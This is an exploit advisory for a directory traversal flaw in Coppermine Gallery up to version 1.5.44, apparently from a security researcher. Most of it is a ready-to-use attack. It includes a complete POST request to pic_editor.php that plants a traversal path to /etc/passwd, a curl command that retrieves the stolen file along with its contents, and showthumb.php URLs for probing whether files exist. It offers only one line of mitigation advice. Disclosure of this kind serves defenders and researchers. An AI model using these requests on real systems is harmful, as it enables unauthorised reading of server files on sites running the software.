Coppermine Gallery <= 1.5.44 directory traversal vulnerability
==============================================================
Coppermine is a multi-purpose fully-featured and integrated web
picture gallery script written in PHP using GD or ImageMagick as
image library with a MySQL backend. A directory travesal vuln
exists within the "save_thumb" function of the "crop & rotate"
image feature. This can be accessed from pic_editor.php. First
upload a file, e.g. "hackerhouse.png" to an album. This will
create a predictable file path location with your userid e.g:

http://target/cpg15x/albums/userpics/10001/hackerhouse.png

You will then send a POST request to pic_editor to manipulate
this file but replace the "new_image" with the filepath you
want to read such as "../../../../../etc/passwd". Your file
will then by copied to a predictible path location as thumb.

http://target/cpg15x/albums/userpics/10001/thumb_hackerhouse.png

To exploit this vulnerability you will need to be able to
register an account and upload files to a photo album. You
do not need admin rights to exploit this flaw. All versions
from cpg 1.4.14 to cpg 1.5.44 have been found vulnerable
to this flaw. The coppermine configuration was tested with
ImageMagick enabled, your mileage may vary with GD1.x/GD2.x.

To protect against this exploit do not allow public registration
requests and only allow trusted users to modify images.

Example POST request
====================
POST /cpg15x/pic_editor.php HTTP/1.1
Host: target
Content-Length: 802
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAE29AdEqShlpLpDF
Accept: text/html,
Accept-Language: en-GB,en-US;q=0.8,en;q=0.6
Cookie: <cookies>
DNT: 1
Connection: close

------WebKitFormBoundaryAE29AdEqShlpLpDF
Content-Disposition: form-data; name="clipval"

10
------WebKitFormBoundaryAE29AdEqShlpLpDF
Content-Disposition: form-data; name="newimage"

../../../../../../../../../../../../../../etc/passwd
------WebKitFormBoundaryAE29AdEqShlpLpDF
Content-Disposition: form-data; name="img_dir"

albums/edit/
------WebKitFormBoundaryAE29AdEqShlpLpDF
Content-Disposition: form-data; name="id"

1
------WebKitFormBoundaryAE29AdEqShlpLpDF
Content-Disposition: form-data; name="angle"

45
------WebKitFormBoundaryAE29AdEqShlpLpDF
100
------WebKitFormBoundaryAE29AdEqShlpLpDF
Content-Disposition: form-data; name="save_thumb"
 
 Save as thumbnail 
------WebKitFormBoundaryAE29AdEqShlpLpDF-- 

Example file download request
=============================
$ curl http://targetip/cpg15x/albums/userpics/10001/thumb_hackerhouse.png 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
... snip

An additional directory traversal vulnerability is present
in "showthumb.php" which can be used to stat() for the existence
of files by reviewing the error returned. You must have 
sufficient rights to use this feature however.

/cpg15x/showthumb.php?picfile=../../../../../../etc/passwd
/cpg15x/showthumb.php?picfile=../../../../../../etc/non-existantfile

-- Hacker Fantastic
 (http://www.myhackerhouse.com)